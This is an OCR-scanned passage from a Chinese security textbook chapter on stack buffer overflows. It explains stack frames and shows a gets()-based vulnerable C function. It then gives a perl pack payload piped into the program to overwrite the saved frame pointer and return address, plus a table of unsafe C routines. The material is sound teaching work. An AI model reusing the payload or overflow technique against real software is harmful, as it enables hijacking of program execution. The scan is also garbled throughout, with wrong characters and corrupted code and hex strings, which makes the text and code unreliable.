CO 在 C 语言 中 字符 串 是 以 字符 数组 的 形式 进行 存储 的 ， 字 符 串 总 是 以 一 个 ASCII 码 值 为 0x00 的 NULL 作为 
结束 的 标志 。 在 数组 里 没有 被 定义 字符 串 占据 的 任何 保留 位 置 都 还 保留 着 以 前 存储 在 该 内 存 区 域 的 值 。 在 
图 10-2 的 “调用 之 前 ” 列 中 、 能 很 明显 地 看 到 在 变量 str2 里 有 以 前 存储 的 值 。 
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在 与 汇编 语言 对 应 的 编程 语言 发 展 的 男 一 端 ，Java、ADA 和 Python 等 现代 高 级 程序 设计 
语言 ， 以 及 很 多 其 他 的 语言 都 有 一 个 关于 变量 类 型 的 较 强 的 概念 ， 并 且 在 它们 之 上 建立 了 允许 
对 其 进行 的 操作 。 这 些 语言 一 般 不 会 发 生 缓冲 区 溢出 ， 因 为 它们 不 允许 超出 缓冲 区 存储 容量 的 
数据 存 入 缓冲 区 中 。 这 些 语言 更 高 的 抽象 级 别 和 安全 的 使 用 特性 ， 意 味 着 程序 员 可 以 付出 更 多 
的 精力 去 关注 如 何 解决 手边 的 问题 ， 不 用 过 多 关注 与 变量 交互 的 管理 细节 。 但 是 这 种 灵活 性 和 
安全 性 在 资源 的 使 用 上 需要 付出 一 定 的 代价 ， 包 括 在 编译 时 ， 以 及 在 运行 时 必须 对 执行 的 附加 
代码 进行 强制 检查 ， 比 如 ， 检 查 缓冲 区 的 限制 。 与 底层 的 机 咒语 言 和 结构 的 距离 也 意味 着 不 能 
访问 一 些 指 令 和 硬件 资源 。 这 就 限制 了 在 编写 代码 时 对 这 些 资源 的 使 用 ， 如 各 种 硬件 的 驱动 程 
序 ， 故 而 必须 要 与 这 些 资 源 交 互 。 

有 一 些 编程 语言 介 于 汇编 语言 和 上 述 高 级 语言 之 间 ， 例 如 C 语言 及 其 派生 的 语言 ， 它 们 
不 仅 拥 有 很 多 现代 的 高 级 控制 结构 和 数据 的 抽象 类 型 ， 而 且 还 提供 了 直接 访问 和 操作 内 存 数据 
的 能 力 。C 语言 是 由 Dennis Ritchie 于 20 世纪 70 年 代 在 贝尔 实验 室 设计 出 来 的 ， 它 最 早 用 于 
编写 UNIX 操作 系统 和 很 多 在 该 系统 上 运行 的 应 用 程序 。C 语言 的 不 断 成 功 是 因为 它 在 具有 高 
级 控制 和 数据 结构 的 表示 能 力 的 同时 ， 还 具有 访问 底层 机 器 资源 的 能 力 ; 也 因为 它 可 以 非常 方 
便 地 移植 到 一 系列 处 理 需 结构 中 。UNIX 是 最 早 用 高 级 语言 编写 的 操作 系统 之 一 ， 这 是 值得 我 
们 注意 的 。 在 那 以 前 (事实 上 从 那 以 后 的 很 多 年 也 是 如 此 )， 操 作 系统 一 般 是 由 汇编 语言 来 编 
写 的 ， 因 而 限制 了 它们 只 能 在 一 个 特定 的 处 理 器 结构 上 使 用 。 不 幸 的 是 ， 对 底层 的 机 器 资源 访 
问 的 能 力 ， 意 味 着 程序 语言 容易 对 内 存 造 成 不 恰当 的 使 用 。 很 多 常见 的 广泛 使 用 的 库 函 数 ， 特 
别 是 那些 与 字符 串 输入 和 处 理 相 关 的 ， 不 能 对 使 用 的 缓冲 区 的 长 度 进行 检查 ， 这 个 事实 使 得 问 
题 进一步 恶化 。 由 于 这 些 函 数 具 有 通用 性 且 被 广泛 应 用 ， 以 及 UNIX 和 它 派生 的 操作 系统 (如 
Linux 系统 等 ) 的 广泛 配置 使 用 ， 都 意味 着 存在 一 个 庞大 的 可 继承 的 代码 体 使 用 这 些 不 安全 的 
函数 ， 因 此 容易 导致 缓冲 区 溢出 。 在 我 们 讨论 应 对 缓冲 区 溢出 的 对 策 之 前 ， 我 们 还 是 先 回 到 组 
冲 区 溢出 这 个 问题 上 。 


10.1.2 ” 栈 缓冲 区 溢出 


当 目 标 缓冲 区 被 设置 在 栈 区 时 ， 所 发 生 的 缓冲 区 溢出 就 是 栈 缓冲 区 溢出 (stack buffer 
overfiow)， 栈 缓冲 区 通常 被 当 作 一 个 阴 数 的 栈 帧 中 的 局 部 变量 。 这 种 形式 的 攻击 又 被 称 为 栈 浇 
出 攻击 (stack smashing), AA 1988 年 Morris Internet 蠕虫 首 次 被 发 现 ， 栈 缓冲 区 洪 出 攻击 就 
出 现 了 。 这 种 攻击 利用 了 一 个 未 经 检查 的 缓冲 区 汶 出 ， 而 溢出 是 由 于 在 守护 进程 fingerd 中 使 
用 C 语 言 的 库 函 数 gets() 导致 的 。Aleph One (Elias Levy) 关于 攻击 的 细节 和 如 何 发 起 攻击 的 文 
章 [LEVY9%6 | 进一步 加 速 了 该 技术 的 应 用 。 在 这 一 章 的 引言 中 我 们 就 已 经 指出 ， 栈 缓冲 区 浇 
出 一 直 被 广泛 利用 ， 因 为 在 广泛 使 用 的 软件 中 新 的 漏洞 不 断 被 发 现 。 

函数 调用 机 制 ” 为 了 帮助 我 们 更 好 地 理解 缓冲 区 溢出 是 如 何 运 作 的 ， 首 先 简要 介绍 程序 中 
的 函数 在 每 一 次 调用 时 管理 它们 的 本 地 状态 所 使 用 的 机 制 。 当 一 个 函数 调用 另 一 个 函数 时 ， 至 
少 它 需 要 在 某 个 地 方 保 存 返回 地 址 ， 这 样 当 调用 完成 以 后 被 调用 的 函数 能 够 将 控制 权 返 还 给 调 
用 函数 。 除 此 之 外 ， 还 需要 一 些 存储 单元 保存 传递 给 被 调用 函数 的 参数 ， 以 及 当 被 调用 的 图 数 
返回 时 ， 也 可 能 保存 它 希 望 继续 使 用 的 寄存 器 变量 的 值 。 所 有 这 些 数 据 一 般 都 保存 在 栈 的 一 个 
RPK AY Beh (stack frame) 的 结构 中 。 被 调用 的 图 数 也 需要 一 些 存储 单元 保存 它 的 局 部 变量 。 
每 一 次 调用 所 使 用 的 某 些 位 置 是 不 同 的 ， 这 样 ， 一 个 函数 才 有 可 能 直接 或 者 间接 地 调用 它 自 
身 ， 这 就 是 递归 函数 调用 ”。 在 大 部 分 现代 程序 设计 语言 中 ,包括 C 语 言 ， 局 部 变量 也 被 存储 


日 早期 的 程序 设计 语言 ， 例 如 Fortran， 并 不 支持 这 种 技术 ， 因 而 Fortran 函数 不 能 递归 调用 。 
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在 函数 的 栈 帧 中 。 那 么 需要 的 更 深 一 层 的 信息 是 把 这 些 栈 帧 链接 在 一 起 的 一 些 方法 ， 这 样 当 一 
个 函数 正在 退出 时 ， 在 将 控制 权 转 移 到 返回 地 址 之 前 ， 它 能 P: 

够 恢复 调用 函数 的 栈 帧 。 图 10-3 给 出 了 这 样 的 一 个 栈 帧 结 

We PRRP 调用 另 一 个 函数 Q 的 一 般 过 程 可 以 总 结 如 [i eC 
下 ,调用 函数 P: 

1. 为 被 调用 的 函数 压 和 参数 进 栈 (一 般 是 按照 参数 声明 fg 
的 相反 顺序 进行 )。 .| 返回 地 址 

被 调用 的 函数 Q; 

3. 压 和 人 当前 的 帧 指针 (也 就 是 图 10-2 中 的 基地 址 指针 ， 
指向 其 调用 函数 的 栈 帧 ) 的 值 到 栈 。 局 部 变量 2 

4 WMATIRELIE GRIES 步 中 的 由 溢 科 的 地 址 )】 le 
赋值 给 帧 指针 ， 使 之 与 分 配给 被 调用 函数 的 新 栈 帧 位 置 相 
一 致 。 _ 

5. 通 过 向 下 移动 栈 指针 ， 在 其 与 前 述 的 帧 指针 的 位 置 ”图 10-3 函数 P 和 Q 的 栈 帧 示例 
之 间 留 下 足够 大 容量 的 方式 ， 为 被 调用 函数 的 局 部 变量 分 配 空间 。 

6. 运行 被 调用 函数 的 函数 体 。 

7. 当 被 调用 函数 退出 时 ， 它 首先 将 帧 指针 值 再 赋值 给 栈 指针 (这样 可 以 有 效 释 放 其 局 部 变 
量 所 使 用 的 地 址 空间 )。 

8. 将 前 一 个 函数 的 帧 指针 值 弹出 栈 (这 样 就 恢复 了 与 调用 函数 的 栈 帧 的 链接 ) 。 

9. 执行 返回 指令 ， 将 保存 的 地 址 从 栈 中 弹出 ， 并 将 控制 权 返 回 给 调用 函数 。 

最 后 ， 调 用 函数 : 

10. 将 被 调用 函数 的 参数 从 栈 中 弹出 。 

11. 继续 执行 调用 函数 中 下 面 的 指令 。 

正如 我 们 以 前 指出 的 那样 ， 这 些 步骤 的 具体 实现 依赖 于 程序 设计 语言 、 编 译 器 和 处 理 器 的 
体系 结构 ， 但 大 多 数 情况 下 的 流程 总 是 与 此 相似 的 。 此 外 ， 这 里 没有 特别 说 明 的 是 ， 调 用 函数 
和 被 调用 函数 如 何在 函数 调用 前 / 后 保存 寄存 器 状态 以 维护 执行 环境 。 这 些 步骤 通常 发 生 在 调 
用 函数 压 人 参数 之 前 ， 或 者 在 被 调用 函数 为 其 局 部 变量 分 配 空间 之 后 。 不 管 哪 种 情况 都 不 会 影 
响 我 们 下 面 讨论 的 缓冲 区 溢出 的 操作 。 关 于 函数 调用 和 返回 机 制 、 栈 帧 的 结构 和 使 用 等 更 多 的 
细节 可 以 查阅 文献 [STAL16b]。 

实现 栈 溢出 的 实例 “基于 前 面 的 背景 ， 我 们 讨论 在 10.1 节 中 介绍 的 基本 缓冲 区 溢出 的 影 
响 。 因 为 局 部 变量 存储 在 被 保存 的 帧 指针 和 返回 地 址 之 下 ， 利 用 一 个 缓冲 区 局 部 变量 溢出 的 漏 
洞 来 改写 这 两 个 对 每 个 函数 都 至 关 重 要 的 关联 值 中 的 一 个 或 者 全 部 ， 是 完全 可 能 的 。 我 们 注意 
到 ， 在 栈 帧 中 为 局 部 变量 分 配 内 存 空间 一 般 是 按照 声明 的 顺序 进行 的 ， 在 内 存 中 从 栈 的 顶部 向 
下 逐渐 增长 。 编 译 器 优化 可 能 改变 这 个 情况 ， 因 而 实际 的 布局 将 按照 任何 具体 程序 的 偏好 来 确 
定 。 这 种 改写 保存 的 帧 指针 和 返回 地 址 的 可 能 性 ， 形 成 了 栈 溢出 攻击 的 核心。 

在 这 一 点 上 ， 我们 退 一 步 ， 从 更 广阔 的 视角 来 看 运行 着 的 程序 ， 以 及 程序 代码 、 全 局 数 
据 、 堆 和 栈 等 关键 区 域 ， 这 是 非常 有 用 的 。 当 一 个 程序 运行 时 ， 通 常 操 作 系 统 为 它 创建 一 个 新 
的 进程 。 进 程 被 分 配给 属于 它 自己 的 虚拟 地 址 空间 ， 图 10-4 显示 了 该 虚拟 地 址 空间 的 一 般 结 
构 。 从 图 中 观察 到 ， 可 执行 程序 文件 的 内 容 (包括 全 局 数据 、 重 定位 表 和 实际 的 程序 代码 段 ) 
距离 这 个 地 址 空间 的 底部 很 近 ， 程 序 的 堆 区 被 直接 分 配 在 代码 区 之 上 ， 而 栈 区 是 从 中 部 附近 
(如 果 内 核 空 间 (kernel space) 的 地 址 被 保留 在 上 半 部 ) 或 者 顶部 开始 回 下 分 配 。 因 而 我 们 讨论 
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的 栈 帧 在 栈 区 逐渐 向 下 分 配 ， 正 如 栈 通过 内 存 向 下 逐渐 增加 一 样 。 稍 后 我 们 回 过 头 来 讨论 一 些 
其 他 部 分 。 有 关 进 程 地 址 空间 布局 的 进一步 进程 在 主 存储 
细节 可 以 参考 [STAL16c]。 器 里 的 情况 

为 了 说 明 经 典 的 栈 滋 出 的 操作 ， 我 们 讨 
论 在 图 10-5a 中 给 出 的 C 语 言 的 函数 。 该 函 
数 包含 一 个 局 部 变量 ， 即 缓冲 区 inp。 这 个 
变量 保存 在 这 个 函数 的 栈 帧 里 ， 在 保存 的 帧 
指针 和 返回 地 址 之 下 给 它 分 配 了 空间 ， 如 
图 10-6 所 示 。 这 个 hello 函数 (经 典 的 Hello 
World 程序 的 一 个 版 本 ) 使 用 不 安全 的 库 例 
程 gets) 将 一 个 名 字 读 人 缓冲 区 inp 中 ， 并 
且 立 即 执行 。 接 下 来 它 使 用 库 例 程 printf() 
显示 出 读 入 的 名 字 。 只 要 读 入 一 个 较 短 的 值 
就 不 会 出 现 问 题 ， 程 序 能 够 成 功 调用 这 个 哨 
数 ， 正 如 图 10-5b 中 程序 示例 第 一 次 运行 显 j 
示 的 那样 。 然 而 ， 如 果 输 入 太 多 的 数据 ,就 团 
像 图 10-5b 中 程序 示例 第 二 次 运行 显示 的 一 > 
样 ， 数 据 扩张 超出 缓冲 区 的 末端 ， 最 终 用 垃 国生 
圾 值 (与 提供 的 字符 串 的 二 进 制 表示 一 致 ) 改 | 
写 了 保存 的 帧 指针 和 返回 地 址 。 接 着 ， 当 了 郴 eri 
数 企 图 将 控制 权 转 移 到 返回 地 址 时 ， 很 显然 一 
它 跳 转 到 了 一 个 非法 的 内 存 地 址 ， 导 致 程序 的 
段 错误 ( Segmentation Fault) 和 非 正 常 中 断 ， 如 
图 10-5b 所 示 。 如 果 我 们 提供 图 10-5b 中 第 三 次 运行 时 显示 的 随机 输入 ， 明 显 导 致 程序 前 溃 。 这 就 
演示 了 一 个 基本 的 缓冲 区 溢出 攻击 。 一 旦 程序 骨 演 ， 就 不 能 再 满足 正在 运行 的 水 数 或 者 服务 的 
和 需要。 于 是 ， 栈 溢出 很 轻易 地 就 能 导致 系统 上 一 些 形式 的 拒绝 服务 攻击 。 

对 攻击 者 来 说 ， 比 起 让 程序 立即 崩溃 ,使 其 将 执行 控制 权 转 移 给 攻击 者 指定 的 位 置 和 代码 
显然 更 有 价值 。 最 简单 的 方法 ， 就 是 在 引起 缓冲 区 溢出 的 输入 中 将 会 覆盖 前 一 栈 帧 中 所 保存 返 
回 地 址 的 位 置 上 包含 一 个 攻击 者 选 定 的 目标 地 址 。 这 样 一 来 ， 当 被 攻击 的 苑 数 执行 完成 并 运行 
返回 指令 的 时 候 ， 其 不 会 返回 到 其 调用 函数 ， 而 是 跳 转 到 攻击 者 提供 的 地 址 ， 从 那里 开始 运行 
攻击 者 的 指令 。 

这 个 过 程 同样 可 以 用 图 10-5a 中 的 函数 示例 予以 说 明 。 具 体 地 说 ,我 们 将 展示 缓冲 区 溢出 
如 何 能 够 使 得 hello 不 返回 到 调用 它 的 主 函 数 ， 而 是 重新 执行 它 自己 。 为 了 完成 这 个 工作 ， 我 
们 需要 找到 装载 hello 函数 的 地 址 。 从 前 面 有 关 进 程 创建 的 讨论 中 我 们 记得 ， 当 一 个 程序 运行 
时 ， 程 序 文件 中 的 代码 和 全 局 数据 以 一 个 标准 方式 被 拷贝 到 进程 的 虚拟 地 址 空间 。 因 此 代码 总 
是 被 分 配 在 相同 的 存储 区 域 。 确 定 它 的 位 置 的 最 容易 的 方法 ， 是 在 目标 程序 和 分 解 的 目标 顺 
数 上 运行 调试 器 。 当 我 们 利用 包含 函数 hello 的 程序 示例 在 Knoppix 系统 上 运行 时 ， 使 用 调试 
器 能 够 发 现 函数 hello 的 地 址 为 0x08048394。 这 样 我 们 必须 使 用 这 个 地 址 值 改 写 返回 地 址 。 同 
时 代码 检查 显示 缓冲 区 inp 被 放置 在 当前 帧 指针 以 下 的 24 个 字 节 内 ， 这 就 意味 着 需要 24 个 
字 节 的 内 容 填 满 缓冲 区 ， 直 到 保存 的 帧 指针 。 为 了 使 这 个 示例 能 发 生 洲 出 ， 我 们 使 用 字符 串 
ABCDEFGHQRSTUVWXabcdefgh。 最 后 ， 为 了 改写 返回 地 址 ， 保 存 的 帧 指针 也 必须 要 用 一 些 
有 效 的 内 存 值 进行 改写 (和 否则 在 恢复 到 当前 帧 寄存 器 之 后 对 它 的 任何 使 用 都 会 导致 程序 谣 溃 )。 


一 内 存 项 部 





图 10-4 程序 装载 到 进程 内 存 
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为 了 说 明 这 个 问题 ， 我 们 选择 一 个 栈 区 附近 合适 的 存储 单元 0xbfffffe8 (这 个 值 可 以 任意 选择 )。 
因为 奔腾 处 理 器 结构 使 用 小 端 存储 来 表示 数字 ， 一 个 更 复杂 的 情况 将 会 发 生 。 这 就 总 昧 者 对 
于 一 个 4 字 节 的 值 ， 例 如 我 们 这 里 讨论 的 地 址 值 ， 这 些 字 节 拷 贝 到 内 存 中 应 该 首先 是 最 低 字 

节 ， 接 着 是 次 最 低 ， 最 后 完成 的 是 最 高 字 节 。 这 就 是 说 目标 地 址 0x08048394 在 缓冲 区 里 必须 
aii en eee 保存 的 帧 指针 地 址 必须 以 同样 的 方法 处 理 。 因 为 这 次 攻击 的 目标 
是 再 次 调用 函数 hello， 第 二 行 输入 ， 连 同 在 每 一 行 末 尾 的 新 行 符 ， 是 第 二 次 运行 hello 需要 读 
入 的 ， 也 就 是 字符 串 NNNN。 


void hello(char *tag) 
{ 


char inp{16]; 


printf ("Enter value for $s: ", tag); 
gets (inp); 
printf("Hello your ts is %s\n", tag, inp); 





a) 基本 栈 溢出 的 C 语言 代码 
$ cc -g -o buffer2 buffer2.c 


$ ./buffer2 

Enter value for mame: Bill and Lawrie 
Hello your name is Bill and Lawrie 
buffer2 done 


$ ./buffer2 
Enter value for name: 
Segmentation fault (core dumped) 


$ perl -e ‘print pack("H*", “4142434445464748515253545556575861] 62636465666768 
eefEFEbf948304080adede4e460an) ;' | ./buffer2 

Enter value for name . 

Hello your Re ?pyy] uA is ABCDERGHORSTUVWKabedefguya ae 


Enter value for Kyyu: 
Hello your Kyyu is NNNN 
Segmentation fault (core dumped) 





b) 基本 栈 洲 出 的 运行 示例 
图 10-5 ”实现 基本 栈 溢出 的 示例 


现在 我 们 已 经 确定 形成 缓冲 区 溢出 攻击 所 需要 的 字 节 。 最 后 一 个 复杂 的 问题 是 形成 目标 地 
址 所 需要 的 值 不 见得 都 是 可 打印 的 字符 。 这 样 需要 一 些 办 法 产生 一 个 合适 的 二 进 制 序列 ， 并 将 
其 输入 到 目标 程序 中 。 通 常 我 们 需要 使 用 十 六 进 制 表示 ， 并 在 接 下 来 设法 将 十 六 进 制 转 换 成 二 
i Wi mt 

， 其 函数 pack() 能 很 容易 地 将 一 个 十 六 进 制 的 字符 串 转 换 成 对 应 的 二 进 制 序列 ， 这 个 操作 
Rs 次 运行 中 可 以 看 到 。 综 合 上 面 列 出 的 所 有 因素 ， 我们 找到 一 
个 十 六 进 制 字符 串 414243444546474851525354555657586162636465666768e8ffffbf948304080a4 
e4e4e4e0a， 它 被 Perl 程序 转换 成 二 进 制 输出 ， 通 过 管道 进入 目标 程序 buffer2， 如 图 10-5b 所 
示 。 我 们 观察 到 读 和 人 值 的 提示 和 显示 重复 了 两 次 ， 这 就 说 明 hello 函数 事实 上 被 再 次 执行 。 然 
而 ， 由 于 在 这 两 次 执行 以 后 ， 当 前 栈 帧 已 经 不 再 有 效 了 ， 故 当 hello 盟 数 企图 第 二 次 返回 的 时 
候 ， 它 跳 转 到 一 个 非法 的 内 存 地 址 ， 程 序 崩 演 。 但 是 它 已 经 完成 了 攻击 者 一 开始 想 要 完成 的 工 
E! 在 这 个 示例 中 有 几 个 需要 关注 的 问题 ， 尽 管 在 第 一 次 提示 符 出 现时 提供 的 标识 值 是 正确 
的 ， 但 是 在 显示 啊 应 的 时 候 它 就 已 乡 ag til 这 是 由 于 用 于 结束 输入 字符 串 的 NULL 字符 
恰好 覆盖 了 位 于 返回 值 上 方 的 一 个 字 节 ， 而 这 个 字 节 原本 保存 着 参数 tag 的 地 址 。 这 就 使 得 这 


© Perl ( Practical Extraction and Report Language) 是 广泛 使 用 的 解释 型 脚本 语言 ， 它 经 常 默认 安装 在 UNIX 和 
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个 参数 的 指针 遭 到 修改 ， 指 向 了 修改 后 地 址 处 的 一 些 随机 字 节 。 而 当 hello 函数 第 二 次 运行 时 ， 
其 所 谓 的 “参数 tag” 则 与 位 于 返回 值 下 方 且 被 随机 改写 过 的 帧 指针 的 值 有 关 (因而 指向 了 内 
存 高 端的 某 个 位 置 )， 因 而 可 以 看 到 垃圾 字符 串 。 


gets (inp) gets (inp) 


内 存 地 址 调用 之 前 调用 之 后 包含 的 值 


00850408 
























bffffbe0 3e850408 tag 
DE Se w N 

bffffbde | £0830408 94830408 返回 地 址 

bffffbd8 |e8fbffbf e8ffffbf 前 一 栈 帧 的 
TP EF 基地 址 指针 

bffffbd4 [|60840408 65666768 
heat efgh 

bffffbd0 | 39561540 61626364 
Ov. @ abed 

bffffbcc |15840408 55565758 inp[12-15] 
E UVWX 

bffffbc8 |e8fbffbf 51525354 inpt=1i] 
“ar ee QORST 

bffffbc4 3cfcffbf 45464748 inp [4-7] 
"Pip E FGH 

bffffbcO |34fcffbf 41424344 inp [0=3] 
ts so ABCD 


图 10-6 ”基本 栈 溢出 的 栈 值 
攻击 过 程 在 图 10-6 中 有 进一步 的 说 明 。 图 中 显示 了 栈 帧 的 值 ， 包 括 调用 因数 gets0 以 前 和 调 
用 以 后 局 部 缓冲 区 变量 inp 的 值 。 先 看 一 下 调用 以 前 的 栈 帧 ,我 们 发 现 缓冲 区 变量 inp 中 包含 一 些 
垃圾 值 ， 它 们 是 内 存 中 以 前 留 下 的 值 。 保 存 的 帧 指针 值 是 0xbffffbe8， 返 回 地 址 是 0x080483f0. 
aA PRA gets) 之 后 ， 在 缓冲 区 inp 包含 的 字母 字符 串 之 上 ， 保 存 的 帧 指针 变 成 0xbfffffeg ik 
回 地 址 是 0x08048394， 与 我 们 在 攻击 字符 串 中 设置 的 一 样 。 我 们 也 注意 到 ， 参 数 tag 的 底部 字 
节 已 经 被 破坏 ， 存 储 着 前 面 提 到 的 NULL 的 值 0x00。 很 明显 攻击 正如 我 们 设计 的 那样 进行 。 

我 们 已 经 看 到 了 基本 的 栈 溢出 是 如 何 进行 的 ,下面 研 究 更 复杂 的 溢出 是 如 何 发 生 的 。 很 明 
显 ， 攻 击 者 能 够 使 用 任何 其 所 需要 的 值 来 改写 返回 地 址 ， 不 仅仅 是 目标 函数 的 地 址 ， 也 可 以 是 
任意 函数 的 地 址 ， 或 者 是 程序 或 与 它 有 关 的 系统 库 中 出 现 的 一 系列 机 器 指令 的 实际 地 址 。 下 一 
节 我 们 将 探讨 这 种 变化 。 然 而 ， 原 来 使 用 的 攻击 方法 是 在 溢出 的 缓冲 区 里 包含 希望 执行 的 机 器 
代码 。 也 就 是 说 ， 上 面 的 例子 作为 填充 使 用 的 不 是 字母 序列 ， 而 是 与 希望 执行 的 机 器 代码 对 应 
的 二 进 制 值 。 这 个 代码 被 称 为 shellcode， 我 们 将 简单 地 讨论 它 创建 的 细节 。 在 这 种 情形 下 ， 在 
攻击 中 使 用 的 返回 地 址 是 shellcode 的 起 始 地 址 ， 它 在 目标 函数 的 栈 帧 中 间 的 位 置 。 这 样 当 被 
攻击 的 水 数 返 回 时 就 执行 攻击 者 选择 的 机 器 代码 。 

更 多 的 栈 溢 出 漏洞 ”在 我 们 讨论 shellcode 的 设计 之 前 有 几 个 问题 需要 注意 ， 这 些 问题 是 
关于 一 个 缓冲 区 溢出 攻击 的 目标 函数 的 结构 的 。 迄 今 为 止 ， 在 我 们 使 用 的 所 有 例子 中 都 是 读 取 
输入 数据 时 发 生 缓冲 区 溢出 ， 这 是 早期 缓冲 区 溢出 攻击 采用 的 方法 ， 如 Morris 蠕虫 。 然 而 把 
数据 复制 和 合并 到 缓冲 区 ， 也 有 发 生 缓 冲 区 溢出 的 可 能 ， 因 为 缓冲 区 中 至 少 有 一 部 分 数据 是 从 
程序 外 部 读 和 的。 如 果 程 序 没 有 检查 缓冲 区 的 大 小 ， 或 者 复制 的 数据 没有 正确 中 断 ， 也 能 够 
发 生 缓冲 区 溢出 。 一 个 程序 能 够 安全 读 人 并 保存 输入 数据 ， 并 将 它 传递 给 周围 的 程序 ， 过 一 
段 时 间 男 一 个 函数 没有 安全 地 复制 它 ， 这 也 可 能 造成 一 个 缓冲 区 溢出 。 图 10-7a 中 的 程序 示例 
说 明了 这 种 行为 。 主 函数 main) 包含 了 缓冲 区 buf， 它 将 buf 的 长 度 传递 给 函数 getinp()， 函 数 
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getinp() 使 用 库 例 程 fgets( 安全 读 和 人 一 个 值 。 这 个 例 程 保证 读 入 的 字符 个 数 不 会 多 于 缓冲 区 的 
长 度 ， 并 允许 末尾 的 NULL 存储 。 接 着 函数 getinp() 返回 到 主 函 数 main()， 随 之 主 函 数 main() 
用 buf MEE AB Bal FA eK display()， 这 个 函数 在 被 称 为 tmp 的 第 二 个 局 部 缓冲 区 中 建立 一 
个 啊 应 的 字符 串 并 进行 显示 。 令 人 遗憾 的 是 ， 库 例 程 sprintf) 是 另 一 个 常用 的 不 安全 的 C 语言 
库 例 程 ， 它 没有 正确 检查 是 否 将 太 多 的 数据 写 到 目标 缓冲 区 中 。 在 这 个 例子 中 我 们 注意 到 组 
冲 区 的 长 度 都 是 相同 的 ， 在 C 语言 的 程序 中 这 是 非常 普遍 的 ， 尽 管 相 对 于 这 些 程序 示例 使 用 
的 空间 来 说 它们 是 相当 大 的 。 事 实 上 ， 在 标准 C 语言 的 IO 库 中 有 一 个 被 定义 的 常量 BUFSIZ， 
它 是 输入 缓冲 区 的 默认 长 度 。 在 C 语言 的 程序 中 经 常 把 这 个 常量 当 作 一 个 输入 缓冲 区 的 标准 
长 度 。 问 题 是 当 数据 被 合并 到 一 个 含有 另 一 个 绥 神 区 的 内 容 的 缓冲 区 时 ， 这 使 得 所 需要 的 空间 
就 会 超出 有 效 空 间 ， 就 像 在 这 个 例子 中 它 所 做 的 那样 。 现 在 ， 我 们 来 看 图 10-7b 中 显示 的 这 个 
程序 的 运行 情况 。 第 一 次 运行 的 时 候 读 的 值 很 得， 被 合并 的 值 没 有 破坏 栈 帧 。 第 二 次 运行 的 时 
候 提供 的 输入 太 长 了 。 然 而 ， 因 为 使 用 的 是 一 个 安全 的 输入 函数 ， 仅 仅 读 入 15 个 字符 ， 正 如 
紧 随 其 后 的 那 一 行 显示 的 那样 。 接 下 来 当 这 个 字符 串 与 响应 字符 串 合 并 时 ， 合 并 后 的 长 度 超过 
目标 缓冲 区 的 有 效 空 间 。 实 际 上 ， 它 改写 了 保存 的 由 指针， 但 是 没有 改写 返回 地 址 。 所 以 该 函 
数 返 回 ， 正 如 主 函 数 main) 打印 的 信息 所 表明 的 。 但 是 ， 当 主 函 数 main) 试图 返回 时 ， 因 为 
它 的 栈 帧 已 经 被 破坏 ， 现 在 只 是 一 些 随机 值 ， 程 序 跳 转 到 一 个 非法 的 地 址 ， 随 之 前 溃 。 在 这 种 
情况 下 合并 的 结果 不 一 定 能 到 达 返 回 地 址 ， 除 非 使 用 一 个 较 大 的 缓冲 区 才 有 可 能 。 


Oaks see oe *inp, int isis) 
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display char *val) E ‘Input value: 


“char ‘tmp [16 天 | | buffer3 getinp read SAFE 


| ee “read val: pes val); ‘| | read val: | 
ts (tmp) 7 | | | buffers: one i 


pene tte danean jy ca ; buffer? dime lot 
ry | | | Segmentation fault reer, dumped) 
a) 栈 洲 出 的 男 一 段 C 语言 代码 b) 另 一 个 栈 洲 出 的 运行 示例 
图 10-7 栈 洲 出 的 男 一 个 示例 


这 表明 当 我 们 寻找 缓冲 区 溢出 时 ， 复 制 和 合并 外 部 数据 源 的 所 有 地 方 都 可 能 会 发 生 缓冲 区 
游 出 。 我 们 注意 到 ,缓冲 区 溢出 不 一 定 必须 发 生 在 一 个 程序 的 代码 中 ， 它 们 也 能 (事实 上 的 确 
可 以 ) 发 生 在 程序 调用 的 库 例 程 中 ,包括 标准 库 和 第 三 方 应 用 的 库 。 因 而 ， 不 管 是 对 攻击 者 还 
是 对 防御 者 来 说 ， 可 能 发 生 缓 冲 区 溢出 的 范围 太 大 了 。 在 表 10-2 S 中 给 出 了 一 些 最 常见 的 不 安 
全 的 标准 C 语言 库 例 程 的 列表 。 所 有 这 些 函 数 都 是 可 疑 的 ， 没 有 检查 和 预先 转换 数据 的 总 长 
度 就 不 应 该 使 用 这 些 郴 数 ， 或 者 最 好 蔡 换 成 安全 的 果 数 。 


O ”还 有 可 能 经 常 使 用 的 其 他 不 安全 例 程 ， 包 括 O/S 中 一 些 特 殊 的 例 程 。 微 软 维护 着 不 安全 的 Windows 库 调 用 
的 一 个 列表 ， 如 果 是 Windows 系统 编程 可 以 查阅 这 个 列表 [HOWA07]。 
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表 10-2 一 些 常 见 的 不 安全 的 C 语言 标准 库 例 程 


gets(char *str ) 从 标准 输入 读 一 行 到 字符 串 str 中 

sprintf(char *str, char *format, + ) 根据 提供 的 格式 和 变量 建立 字符 串 str 
strcat(char *dest, char *src ) 将 字符 串 sre 的 内 容 追 加 到 字符 串 dest 
strcpy(char *dest, char *src ) 将 字符 串 sre 的 内 容 复 制 到 字符 串 dest 
vsprintf(char *str, char *fmt, va_list ap ) 根据 提供 的 格式 和 变量 建立 字符 串 str 


在 我 们 讨论 shellcode 的 细 市 之 前 还 需要 进一步 关注 的 一 个 问题 就 是 ， 各 种 各 样 的 基于 栈 
的 缓冲 区 溢出 的 结果 表明 ， 在 栈 项 部 附近 的 内 存 发 生 了 重大 的 变化 。 特 别 是 返回 地 址 和 指向 旧 
的 栈 帧 的 指针 都 已 被 毁坏 ， 这 就 是 说 在 攻击 者 的 代码 运行 之 后 很 难 恢复 程序 状态 并 继续 运行 。 
对 于 攻击 者 来 说 这 无 关 紧要 ， 毕 竟 其 通 稼 的 做 法 本 来 就 要 用 一 个 shell 命令 蔡 代 现 有 的 程序 代 
码 。 但 是 即使 攻击 者 不 这 样 做 ， 要 想 让 受到 攻击 的 程序 继续 正常 运行 也 是 不 太 可 能 的 。 攻 击 的 
任何 尝试 都 将 使 程序 崩溃 。 这 就 意味 着 一 个 成 功 的 缓冲 区 涪 出 攻击 都 会 导致 被 攻击 的 程序 提供 
的 函数 和 服务 丢失 。 这 一 后 果 有 多 严重 、 多 醒目 ， 很 大 程度 上 取决 于 被 攻击 的 程序 及 其 运行 的 
环境 。 如 果 它 是 一 个 客户 端的 进程 或 者 线程 ， 正 在 为 个 人 请 求 服务 ， 除 去 可 能 日 志 中 有 一 些 错 
